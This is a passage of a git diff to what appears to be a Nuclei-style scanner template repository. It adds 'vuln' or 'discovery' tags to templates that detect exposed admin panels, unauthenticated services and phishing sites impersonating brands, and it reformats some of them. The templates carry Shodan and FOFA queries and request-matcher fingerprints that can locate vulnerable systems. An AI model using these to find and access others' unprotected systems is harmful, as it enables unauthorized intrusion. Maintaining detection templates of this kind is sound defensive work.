tags: config,unauth,prtg,edb,misconfig + tags: config,unauth,prtg,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-tensorboard.yaml b/http/misconfiguration/unauthenticated-tensorboard.yaml index 2c981c361c9..112c0d9b6d1 100644 --- a/http/misconfiguration/unauthenticated-tensorboard.yaml +++ b/http/misconfiguration/unauthenticated-tensorboard.yaml @@ -7,7 +7,7 @@ info: description: Tensorflow Tensorboard was able to be accessed with no authentication requirements in place. metadata: max-request: 1 - tags: tensorflow,tensorboard,unauth,misconfig + tags: tensorflow,tensorboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml b/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml index 68ede30744b..5a7258d91f3 100644 --- a/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml +++ b/http/misconfiguration/unauthenticated-varnish-cache-purge.yaml @@ -10,7 +10,7 @@ info: - https://hackerone.com/reports/154278 metadata: max-request: 1 - tags: misconfig,cache,hackerone,varnish + tags: misconfig,cache,hackerone,varnish,vuln http: - method: PURGE diff --git a/http/misconfiguration/unauthenticated-zipkin.yaml b/http/misconfiguration/unauthenticated-zipkin.yaml index 7dc6eb1b42f..f0029f8d7a4 100644 --- a/http/misconfiguration/unauthenticated-zipkin.yaml +++ b/http/misconfiguration/unauthenticated-zipkin.yaml @@ -9,7 +9,7 @@ info: - https://zipkin.io/ metadata: max-request: 1 - tags: unauth,misconfig + tags: unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthorized-h3csecparh-login.yaml b/http/misconfiguration/unauthorized-h3csecparh-login.yaml index 58d63a39732..8c44dad111d 100644 --- a/http/misconfiguration/unauthorized-h3csecparh-login.yaml +++ b/http/misconfiguration/unauthorized-h3csecparh-login.yaml @@ -14,7 +14,7 @@ info: product: secpath_f5060 shodan-query: http.html:"H3C-SecPath-运维审计系统" fofa-query: app="H3C-SecPath-运维审计系统" && body="2018" - tags: h3c,default-login,unauth,misconfig + tags: h3c,default-login,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unauthorized-plastic-scm.yaml b/http/misconfiguration/unauthorized-plastic-scm.yaml index 32621fba36e..bc50ca9503d 100644 --- a/http/misconfiguration/unauthorized-plastic-scm.yaml +++ b/http/misconfiguration/unauthorized-plastic-scm.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-288 metadata: max-request: 3 - tags: plastic,misconfig,intrusive + tags: plastic,misconfig,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml b/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml index 212e87e25d4..e86500ec3ff 100644 --- a/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml +++ b/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 fofa-query: 'app="puppet-Node-Manager"' - tags: node,misconfig + tags: node,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml index 9e7812b815f..bd967376b3b 100644 --- a/http/misconfiguration/unigui-server-monitor-exposure.yaml +++ b/http/misconfiguration/unigui-server-monitor-exposure.yaml @@ -1,5 +1,5 @@ -id: unigui-server-monitor-exposure - +id: unigui-server-monitor-exposure + info: name: UniGUI Server Monitor Panel - Exposure author: serrapa @@ -13,24 +13,24 @@ info: max-request: 1 shodan-query: title:"uniGUI" fofa-query: title="uniGUI" - tags: exposure,unigui,misconfig + tags: exposure,unigui,misconfig,vuln -http: - - method: GET - path: - - "{{BaseURL}}/server" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")' - - 'status_code == 200' - condition: and - - - type: dsl - dsl: - - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' - - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' +http: + - method: GET + path: + - "{{BaseURL}}/server" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains_any(body, "uniGUI Standalone Server", "uniGUI License Information", "Server Statistics")' + - 'status_code == 200' + condition: and + + - type: dsl + dsl: + - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' + - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' condition: or # digest: 4a0a0047304502202c12c275139d1744ffc1abfc863ed684621dbbdab4d62bd5c4e02a610c8be9f302210097976fb041aa3e91cef4e753750c329c28f1dc2df4727c1eba7b47839e33a479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/untangle-admin-setup.yaml b/http/misconfiguration/untangle-admin-setup.yaml index e5e25d51dd1..5aa0d59472f 100644 --- a/http/misconfiguration/untangle-admin-setup.yaml +++ b/http/misconfiguration/untangle-admin-setup.yaml @@ -14,7 +14,7 @@ info: product: ng_firewall shodan-query: title:"Setup Wizard" html:"untangle" fofa-query: title="Setup Wizard" && "untangle" - tags: misconfig,untangle,admin,setup + tags: misconfig,untangle,admin,setup,vuln http: - method: GET diff --git a/http/misconfiguration/ups-status.yaml b/http/misconfiguration/ups-status.yaml index d9345f0431b..18f37d0c652 100644 --- a/http/misconfiguration/ups-status.yaml +++ b/http/misconfiguration/ups-status.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: logs,status,edb,misconfig + tags: logs,status,edb,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/v2x-control.yaml b/http/misconfiguration/v2x-control.yaml index 3b682e7be51..6a48aebf07a 100644 --- a/http/misconfiguration/v2x-control.yaml +++ b/http/misconfiguration/v2x-control.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: title:"V2X Control" - tags: misconfig,exposure,v2x,control + tags: misconfig,exposure,v2x,control,vuln http: - method: GET diff --git a/http/misconfiguration/vercel-source-exposure.yaml b/http/misconfiguration/vercel-source-exposure.yaml index a5089d2b096..3bfb8ee4a7e 100644 --- a/http/misconfiguration/vercel-source-exposure.yaml +++ b/http/misconfiguration/vercel-source-exposure.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: cname_domain="vercel.app" || icon_hash="-2070047203" - tags: vercel,exposure,misconfig + tags: vercel,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/vernemq-status-page.yaml b/http/misconfiguration/vernemq-status-page.yaml index 0ba8af8e995..a45b67821b3 100644 --- a/http/misconfiguration/vernemq-status-page.yaml +++ b/http/misconfiguration/vernemq-status-page.yaml @@ -9,7 +9,7 @@ info: - https://github.com/vernemq/vernemq metadata: max-request: 1 - tags: misconfig,vernemq,status + tags: misconfig,vernemq,status,vuln http: - method: GET diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 18767cf2ba4..00245abc73f 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" - tags: status,exposure,viewpoint,misconfig + tags: status,exposure,viewpoint,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/wamp-server-configuration.yaml b/http/misconfiguration/wamp-server-configuration.yaml index 59cd65c7311..dfe83d8725d 100644 --- a/http/misconfiguration/wamp-server-configuration.yaml +++ b/http/misconfiguration/wamp-server-configuration.yaml @@ -8,7 +8,7 @@ info: reference: https://www.exploit-db.com/ghdb/6891. metadata: max-request: 1 - tags: wamp,exposure,misconfig + tags: wamp,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/wamp-xdebug-detect.yaml b/http/misconfiguration/wamp-xdebug-detect.yaml index bb8372997cd..c55325c6140 100644 --- a/http/misconfiguration/wamp-xdebug-detect.yaml +++ b/http/misconfiguration/wamp-xdebug-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: debug,config,wamp,misconfig + tags: debug,config,wamp,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/weaviate-exposure.yaml b/http/misconfiguration/weaviate-exposure.yaml index 48a9f82810e..d28921fc084 100644 --- a/http/misconfiguration/weaviate-exposure.yaml +++ b/http/misconfiguration/weaviate-exposure.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Weaviate" - tags: weaviate,exposure,api + tags: weaviate,exposure,api,vuln http: - method: GET diff --git a/http/misconfiguration/webalizer-statistics.yaml b/http/misconfiguration/webalizer-statistics.yaml index b65da48ba68..01c359b089f 100644 --- a/http/misconfiguration/webalizer-statistics.yaml +++ b/http/misconfiguration/webalizer-statistics.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: html:"Generated by The Webalizer" - tags: webalizer,logs,statistics,tenable,misconfig + tags: webalizer,logs,statistics,tenable,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/webdav-enabled.yaml b/http/misconfiguration/webdav-enabled.yaml index 311db787f70..a24606637b9 100644 --- a/http/misconfiguration/webdav-enabled.yaml +++ b/http/misconfiguration/webdav-enabled.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 3 shodan-query: "Ms-Author-Via: DAV" - tags: webdav,misconfig,exposure + tags: webdav,misconfig,exposure,vuln http: - raw: diff --git a/http/misconfiguration/whisparr-dashboard-unauth.yaml b/http/misconfiguration/whisparr-dashboard-unauth.yaml index f27ea2e8988..66e689623af 100644 --- a/http/misconfiguration/whisparr-dashboard-unauth.yaml +++ b/http/misconfiguration/whisparr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Whisparr" - tags: whisparr,dashboard,unauth,misconfig + tags: whisparr,dashboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/wildcard-postmessage.yaml b/http/misconfiguration/wildcard-postmessage.yaml index aa17ebccf06..7c7de540129 100644 --- a/http/misconfiguration/wildcard-postmessage.yaml +++ b/http/misconfiguration/wildcard-postmessage.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - tags: xss,postmessage,misconfig + tags: xss,postmessage,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/woodwing-git.yaml b/http/misconfiguration/woodwing-git.yaml index 125043a92de..40295d3dfd2 100644 --- a/http/misconfiguration/woodwing-git.yaml +++ b/http/misconfiguration/woodwing-git.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" - tags: misconfig,woodwing,git,config + tags: misconfig,woodwing,git,config,vuln http: - method: GET diff --git a/http/misconfiguration/woodwing-phpinfo.yaml b/http/misconfiguration/woodwing-phpinfo.yaml index 08e2a7f8fad..429721ac4bd 100644 --- a/http/misconfiguration/woodwing-phpinfo.yaml +++ b/http/misconfiguration/woodwing-phpinfo.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" - tags: misconfig,woodwing,phpinfo + tags: misconfig,woodwing,phpinfo,vuln http: - method: GET diff --git a/http/misconfiguration/wp-registration-enabled.yaml b/http/misconfiguration/wp-registration-enabled.yaml index e5c044469a4..ceae993ba8b 100644 --- a/http/misconfiguration/wp-registration-enabled.yaml +++ b/http/misconfiguration/wp-registration-enabled.yaml @@ -17,7 +17,7 @@ info: metadata: verified: true max-request: 1 - tags: wordpress,wp,misconfig + tags: wordpress,wp,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/xss-deprecated-header.yaml b/http/misconfiguration/xss-deprecated-header.yaml index 608c4522b8e..e5a3aed07ba 100644 --- a/http/misconfiguration/xss-deprecated-header.yaml +++ b/http/misconfiguration/xss-deprecated-header.yaml @@ -13,7 +13,7 @@ info: cvss-score: 0 metadata: max-request: 1 - tags: xss,misconfig,generic + tags: xss,misconfig,generic,vuln http: - method: GET diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml index 33f51c64196..2cad5aac622 100644 --- a/http/misconfiguration/zabbix-dashboards-access.yaml +++ b/http/misconfiguration/zabbix-dashboards-access.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: edb,packetstorm,zabbix,unauth,misconfig,xss + tags: edb,packetstorm,zabbix,unauth,misconfig,xss,vuln http: - method: GET diff --git a/http/misconfiguration/zabbix-error.yaml b/http/misconfiguration/zabbix-error.yaml index dad915752e7..7de52b295e5 100644 --- a/http/misconfiguration/zabbix-error.yaml +++ b/http/misconfiguration/zabbix-error.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Warning [refreshed every 30 sec.]" product: zabbix_server vendor: zabbix - tags: zabbix,misconfig + tags: zabbix,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml index be5208d6b97..36c153e31e5 100644 --- a/http/misconfiguration/zenphoto-sensitive-info.yaml +++ b/http/misconfiguration/zenphoto-sensitive-info.yaml @@ -7,7 +7,7 @@ info: description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure metadata: max-request: 4 - tags: misconfig,unauth + tags: misconfig,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml index e96c06f86a8..20a054ca4b5 100644 --- a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml +++ b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml @@ -9,7 +9,7 @@ info: - https://buaq.net/go-53721.html metadata: max-request: 1 - tags: seeyon,unauth,zhiyuan,misconfig + tags: seeyon,unauth,zhiyuan,misconfig,vuln http: - method: GET diff --git a/http/osint/phishing/1password-phish.yaml b/http/osint/phishing/1password-phish.yaml index 4e943967c5e..e206fce77a5 100644 --- a/http/osint/phishing/1password-phish.yaml +++ b/http/osint/phishing/1password-phish.yaml @@ -1,5 +1,5 @@ -id: 1password-phish - +id: 1password-phish + info: name: 1password phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://1password.com metadata: max-request: 1 - tags: phishing,1password,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Manager for Families, Enterprise & Business | 1Password' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,1password,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Manager for Families, Enterprise & Business | 1Password' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"1password.com")' # digest: 4a0a00473045022100bacc4eb107d1db94f1afef18ecdfaa574a9f31627ac5b70c5f2bb5a72f16e4f0022024bc6c1e23daf9ad354257c829f133c9490f92e074c2c38937b27f11dc90618d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/adobe-phish.yaml b/http/osint/phishing/adobe-phish.yaml index 6fd73a302bd..70787fbe1f3 100644 --- a/http/osint/phishing/adobe-phish.yaml +++ b/http/osint/phishing/adobe-phish.yaml @@ -1,5 +1,5 @@ -id: adobe-phish - +id: adobe-phish + info: name: adobe phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://adobe.com metadata: max-request: 1 - tags: phishing,adobe,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe: Creative, marketing and document management solutions' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,adobe,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe: Creative, marketing and document management solutions' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"adobe.com")' # digest: 490a0046304402203b70d3df5661ee6211be22418d84e47b5da2a4e256de84b1df831cf80a3fcf2602202a4c8c2daf2827bca7760bca835ce894776e61148508fab42b739cb6eb20176d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/aliexpress-phish.yaml b/http/osint/phishing/aliexpress-phish.yaml index 42200601818..7930d8e82e7 100644 --- a/http/osint/phishing/aliexpress-phish.yaml +++ b/http/osint/phishing/aliexpress-phish.yaml @@ -1,5 +1,5 @@ -id: aliexpress-phish - +id: aliexpress-phish + info: name: aliexpress phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://aliexpress.com metadata: max-request: 1 - tags: phishing,aliexpress,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'AliExpress - Affordable Prices on Top Brands with Free Shipping' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,aliexpress,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'AliExpress - Affordable Prices on Top Brands with Free Shipping' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"aliexpress.com")' # digest: 4a0a0047304502206cdb560a0f2527bdc97e8d81f77c21315779a61ea8cdb13fd44275eccd006d2b022100ec51ad0a103c9c0f31b93939f6a26a118d869b5904e5cb62684cd6a5ec3d943f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/amazon-phish.yaml b/http/osint/phishing/amazon-phish.yaml index 9ecd9872543..0bc00f8c745 100644 --- a/http/osint/phishing/amazon-phish.yaml +++ b/http/osint/phishing/amazon-phish.yaml @@ -1,5 +1,5 @@ -id: amazon-phish - +id: amazon-phish + info: name: Amazon phishing Detection author: rxerium @@ -10,45 +10,45 @@ info: - https://amazon.com metadata: max-request: 1 - tags: phishing,amazon,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Amazon Sign In' - - 'Amazon Sign-In' - condition: or - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"amazon.com")' - - '!contains(host,"amazon.co.uk")' - - '!contains(host,"amazon.co.es")' - - '!contains(host,"amazon.sg")' - - '!contains(host,"amazon.sa")' - - '!contains(host,"amazon.ca")' - - '!contains(host,"amazon.cn")' - - '!contains(host,"amazon.eg")' - - '!contains(host,"amazon.fr")' - - '!contains(host,"amazon.de")' - - '!contains(host,"amazon.in")' - - '!contains(host,"amazon.it")' - - '!contains(host,"amazon.co.jp")' - - '!contains(host,"amazon.pl")' - - '!contains(host,"amazon.se")' - - '!contains(host,"amazon.ae")' - - '!contains(host,"amazon.com.tr")' + tags: phishing,amazon,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Amazon Sign In' + - 'Amazon Sign-In' + condition: or + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"amazon.com")' + - '!contains(host,"amazon.co.uk")' + - '!contains(host,"amazon.co.es")' + - '!contains(host,"amazon.sg")' + - '!contains(host,"amazon.sa")' + - '!contains(host,"amazon.ca")' + - '!contains(host,"amazon.cn")' + - '!contains(host,"amazon.eg")' + - '!contains(host,"amazon.fr")' + - '!contains(host,"amazon.de")' + - '!contains(host,"amazon.in")' + - '!contains(host,"amazon.it")' + - '!contains(host,"amazon.co.jp")' + - '!contains(host,"amazon.pl")' + - '!contains(host,"amazon.se")' + - '!contains(host,"amazon.ae")' + - '!contains(host,"amazon.com.tr")' condition: and # digest: 4a0a0047304502210088c37e8c251fd7d61d013a2acd67e5f66827a9432f9f3624f7e561f9f355fda202206fbce1fad00ca2351010ee40bf39950f618241d74f4857a20ab1abeb3daf4f6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/amazon-web-services-phish.yaml b/http/osint/phishing/amazon-web-services-phish.yaml index fc7ef6e60f4..f90016000d4 100644 --- a/http/osint/phishing/amazon-web-services-phish.yaml +++ b/http/osint/phishing/amazon-web-services-phish.yaml @@ -1,5 +1,5 @@ -id: amazon-web-services-phish - +id: amazon-web-services-phish + info: name: amazon web services phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://signin.aws.amazon.com metadata: max-request: 1 - tags: phishing,amazon-web-services,aws,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Amazon Web Services Sign-In' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,amazon-web-services,aws,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Amazon Web Services Sign-In' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"amazon.com")' # digest: 4a0a00473045022100c122392de5c56d7e4b20d025c3c04616c13a960e59646a9e8f436e34002c66360220521ea5135119193529ade7b82ce7e9e928abbf42f18f135b5ff84dff0e6b868c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/american-express-phish.yaml b/http/osint/phishing/american-express-phish.yaml index d1e54a4dcfb..76db0cc4093 100644 --- a/http/osint/phishing/american-express-phish.yaml +++ b/http/osint/phishing/american-express-phish.yaml @@ -1,5 +1,5 @@ -id: american-express-phish - +id: american-express-phish + info: name: american-express phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.americanexpress.com metadata: max-request: 1 - tags: phishing,american-express,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Credit Cards, Rewards, Travel and Business Services | American Express' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,american-express,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Credit Cards, Rewards, Travel and Business Services | American Express' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"americanexpress.com")' # digest: 4a0a0047304502210090068e5aeb1f85e0088dc2d9604e687551135531a6b9ca1e07f1ac819348845f022003269fbcd7b5df5ba4649753deb6c677e3afcef9ccdb72604227a8c61e2f64af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/anydesk-phish.yaml b/http/osint/phishing/anydesk-phish.yaml index ceb31e92d27..edcd836412a 100644 --- a/http/osint/phishing/anydesk-phish.yaml +++ b/http/osint/phishing/anydesk-phish.yaml @@ -1,5 +1,5 @@ -id: anydesk-phish - +id: anydesk-phish + info: name: anydesk phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://anydesk.com metadata: max-request: 1 - tags: phishing,anydesk,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'The Fast Remote Desktop Application – AnyDesk' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,anydesk,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'The Fast Remote Desktop Application – AnyDesk' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"anydesk.com")' # digest: 4a0a00473045022029b2b4bcddbd16326382b251ffa6d6b7552dfd7f210fba05f3b37673c563b8a4022100b0376cdd6d5be68f85d0cb6e2c96c631e96b709ef855b29fc2bcdcfebf9b75b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/avast-phish.yaml b/http/osint/phishing/avast-phish.yaml index a3d8bfde090..ef9020fcd71 100644 --- a/http/osint/phishing/avast-phish.yaml +++ b/http/osint/phishing/avast-phish.yaml @@ -1,5 +1,5 @@ -id: avast-phish - +id: avast-phish + info: name: avast phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://avast.com metadata: max-request: 1 - tags: phishing,avast,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Avast | Download Free Antivirus & VPN | 100% Free & Easy' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,avast,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Avast | Download Free Antivirus & VPN | 100% Free & Easy' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"avast.com")' # digest: 4a0a0047304502210083706f82b8007bec51b940faffb784efe013d278b31a51aced7a66d111863b7702202475ad3324e3400bb4432f806cca8214b75f0d43c5f711463be1a35f3dfda841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/avg-phish.yaml b/http/osint/phishing/avg-phish.yaml index a0a6aa16a82..c5cedb19bd6 100644 --- a/http/osint/phishing/avg-phish.yaml +++ b/http/osint/phishing/avg-phish.yaml @@ -1,5 +1,5 @@ -id: avg-phish - +id: avg-phish + info: name: avg phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://avg.com metadata: max-request: 1 - tags: phishing,avg,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'AVG 2024 | FREE Antivirus, VPN & TuneUp for All Your Devices' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,avg,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'AVG 2024 | FREE Antivirus, VPN & TuneUp for All Your Devices' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"avg.com")' # digest: 4b0a00483046022100f1a917f82b58fa02e01e22d9d48ebc0ba8343ed420d9e99fd7306f734d147b360221009fe4bb64e7bc7b8766fe4059e89eaf67f73967fba51c95a026f0c3a3794396e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/bank-central-asia-phish.yaml b/http/osint/phishing/bank-central-asia-phish.yaml index 49cf950563a..31991d2215e 100644 --- a/http/osint/phishing/bank-central-asia-phish.yaml +++ b/http/osint/phishing/bank-central-asia-phish.yaml @@ -10,7 +10,7 @@ info: - https://bca.co.id metadata: max-request: 1 - tags: phishing,bca,osint + tags: phishing,bca,osint,discovery http: - method: GET path: diff --git a/http/osint/phishing/bank-of-america-phish.yaml b/http/osint/phishing/bank-of-america-phish.yaml index 8fc864df02d..1fa8029b1d6 100644 --- a/http/osint/phishing/bank-of-america-phish.yaml +++ b/http/osint/phishing/bank-of-america-phish.yaml @@ -1,5 +1,5 @@ -id: bank-of-america-phish - +id: bank-of-america-phish + info: name: Bank Of America phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://bankofamerica.com metadata: max-request: 1 - tags: phishing,BankOfAmerica,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Bank of America - Banking, Credit Cards, Loans and Merrill Investing' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,BankOfAmerica,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Bank of America - Banking, Credit Cards, Loans and Merrill Investing' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"bankofamerica.com")' # digest: 4a0a004730450221008f888a664405d39e7733be75bbe56ce9c25a81705867cac9b86af01501f5473b02205a76d38ec234a7215f765a9c10b851ef874c81d321d283e03b21a631c54a584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/battlenet-phish.yaml b/http/osint/phishing/battlenet-phish.yaml index 4d82d539790..5019238a15b 100644 --- a/http/osint/phishing/battlenet-phish.yaml +++ b/http/osint/phishing/battlenet-phish.yaml @@ -1,5 +1,5 @@ -id: battlenet-phish - +id: battlenet-phish + info: name: battlenet phishing Detection author: rxerium @@ -10,27 +10,27 @@ info: - https://eu.account.battle.net/login metadata: max-request: 1 - tags: phishing,battlenet,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Battle.net Login' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"battle.net")' + tags: phishing,battlenet,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Battle.net Login' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"battle.net")' - '!contains(host,"blizzard.com")' # digest: 4a0a004730450221008bae14396b0792742d026f0e859c2afc2419645c96ecb60f0abc33d59e72045902206e3f264720302664473679a1c19ffb927459f525b19b9aacab6136c78ba56bdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/bestbuy-phish.yaml b/http/osint/phishing/bestbuy-phish.yaml index 227b501ed59..5ce13b5d30a 100644 --- a/http/osint/phishing/bestbuy-phish.yaml +++ b/http/osint/phishing/bestbuy-phish.yaml @@ -1,5 +1,5 @@ -id: best-buy-phish - +id: best-buy-phish + info: name: 